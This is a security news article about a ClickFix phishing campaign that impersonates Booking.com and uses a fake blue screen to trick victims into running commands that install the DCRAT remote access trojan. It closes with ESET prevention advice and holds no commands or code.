A. M. 
A fake email campaign impersonating Booking.com was recently detected by security researchers. The messages warn of alleged problems with reservations or pending refunds and include malicious links that lead to a chain of deceptions, the goal of which is to trick the victim into installing infostealer malware, designed to steal sensitive information. The campaign was analyzed by the Securonix.
The technique used, known as ClickFix, reflects the evolution of social engineering as an attack vector. Instead of directly exploiting technical vulnerabilities, attackers manipulate users into executing malicious commands on their systems. According to the latest ESET Threat Report , this technique saw a growth of over 500% in detections during the first quarter of 2025, positioning itself as the second most frequent attack vector after phishing.
The fraudulent email uses Booking.com’s branding and language, making it difficult to distinguish from a legitimate one. Feeling the urgency to resolve a supposed booking issue, the user clicks on the link in the message, which redirects them to a fake website that mimics the original platform.
On the fraudulent site, the browser displays a false message indicating that the page is taking too long to load. Upon clicking the refresh button, the browser goes into full-screen mode and displays a fake Windows Blue Screen of Death (BSOD), simulating a critical system error.
Unlike a real BSOD, this screen includes instructions for the user to run commands in PowerShell or the Windows Run dialog box, under the guise of fixing the supposed technical problem. In doing so, the victim ends up infecting their own computer.
Following the instructions triggers a chain of malicious actions, including the download of a .NET project compiled using MSBuild.exe, the installation of a remote access Trojan (DCRAT), the disabling of defenses like Windows Defender, and the granting of persistence and privilege escalation on the system.
This malware allows remote control of the computer, keystroke logging, command execution, and the download of additional payloads, such as cryptocurrency miners, facilitating data theft and lateral spread.
“Cybercriminals no longer need to directly compromise the system: they only need to convince the user to do it for them. That’s why campaigns like ClickFix demonstrate that education and paying attention to urgent messages remain key protective barriers”, says Martina López, IT Security Specialist at ESET Latin America.
How to prevent these types of attacks
Always verify the authenticity of emails.
- Do not run unknown commands or follow instructions on supposed error screens.
- Train staff, especially in sectors where urgency is common.
- Use reliable security solutions that detect abuse of legitimate tools and block unauthorized downloads.
- Educate about social engineering: understand that many current threats rely more on manipulating the user than on directly compromising software.
ESET invites you to check out Secure Connection, its podcast to learn what’s happening in the world of cybersecurity. To listen, go to:
You can also read:
